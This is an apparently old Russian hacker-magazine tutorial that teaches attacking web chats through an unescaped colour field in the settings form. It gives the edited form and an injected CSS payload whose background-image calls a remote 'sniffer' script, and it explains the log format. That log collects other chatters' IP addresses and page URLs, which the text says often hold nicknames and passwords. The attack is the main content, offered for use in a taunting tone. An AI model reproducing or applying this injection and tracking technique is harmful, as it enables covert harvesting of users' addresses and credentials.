Что, дружок, начитался
рассказов, как вставлять в чаты картинки? Только
вот после ввода в чате <img src=megaporno.jpg> ничего не
происходит, а все присутствующие хором кричат в
твою сторону "14m0"? Правильно, теги в чатах
оставляли в 80-х годах, теперь все по-другому. Но
нередко админы забывают про дырку с цветом.

Сначала давай разберемся, что
же это за дырка такая. Когда ты выбираешь
настройки чата, обычно существует возможность
выбора цвета. Сохраняем эту страничку на диск и
открываем ее Блокнотиком. Находим что-то вроде
этого:
<FORM ACTION="/cgi-bin/chat.cgi" METHOD="POST">
<input name="name" type="text">
<select name="color">
<option value="#FF0000">Красный</option>
<option value="#00FF00">Зеленый</option>
</select>
<input name="submit">
</FORM>

Изменяем строчку
ACTION="/cgi-bin/chat.cgi" на
ACTION="http://www.hackedsite.ru/cgi-bin/chat.cgi" и <option
value="#FF0000">Красный</option> на
<option="#0000FF">Синий</option>. Заходим в чат.
Пишем синим? Ага. Даже если не пишем, все равно.

Теперь изменяем строчку <option
value="0000FF">Синий</option> на <option value="#0000FF;
style="height:1;font-size:1pt;background-image:
url(‘http://www.hackzone.ru/cgi-bin/sniff.cgi?xakep’)">ХАК</option>.
Я смотрю, твои слабенькие ручки замучались
писать. Училка в школе заставляет, так еще тут?
Остынь, я пока расскажу, что же мы понаписали. "
— означает ставку кавычек. Кавычки нужны, чтобы
закрыть параметр <font color="#0000FF". Как видишь,
тег не закрыт, и мы можем в нем поковыряться.
Ковыряйся, не ковыряйся, а без CSS (Cascading Style Sheets) в
теге font можно изменить только параметры color-цвет,
size-размер и face-тип шрифта. А вот CSS позволяет
многое. Итак, ты понял, что значит style=&quot; —
начало CSS. Дальше идут параметры стилей:

  • height:1; означает, что
    максимальная высота слоя шрифта не более 1
    пиксела.
  • font-size:1pt; означает, что размер
    шрифта в слое 1-го размера.
  • background-image:
    url(‘http://www.hackzone.ru/cgi-bin/sniff.cgi?xakep’) означает то, что
    фоновое изображение для слоя шрифта будет sniffer от
    HACKZONE.

После входа в чат, напиши что-нибудь.
Никто ничего не увидит, кроме маленьких точек.
Все IP участников чата, а также URL их страничек (нередко
содержащих ник и пароль к нему), где был показан
твой sniffer будут лежать в логе http://www.hackzone.ru/files/snifflog.txt.
    Теперь о формате лога. Каждая его
строчка выглядит примерно так:
    [Sat 0:00am] (xakep) 192.168.87.1
[http://www.hackedsite.ru/cgi-bin/messages.cgi?id=nuncuk]
    Расшифровка.
    [Sat 0:00am] — дата и время, когда была
просмотрена картинка-sniffer.
    (xakep) — id sniffer’а (берется из http://www.hackzone.ru/cgi-bin/sniff.cgi?xakep).
    192.168.87.1 — IP-адрес посмотревшего
картинку-sniffer.
    [http://www.hackedsite.ru/cgi-bin/messages.cgi?id=nuncuk] —
страничка, на которой был просмотрен sniffer.
    Все, теперь ты настоящая боевая машина,
способная узнать IP без тегов. Все стандарты CSS
можно почитать на www.w3.org.
Спасибо за внимание, все свободны.

Оставить мнение

Check Also

Конкурс хаков: пишем на PowerShell скрипт, который уведомляет о днях рождения пользователей Active Directory

В компаниях часто встречается задача уведомлять сотрудников о приближающихся днях рождения…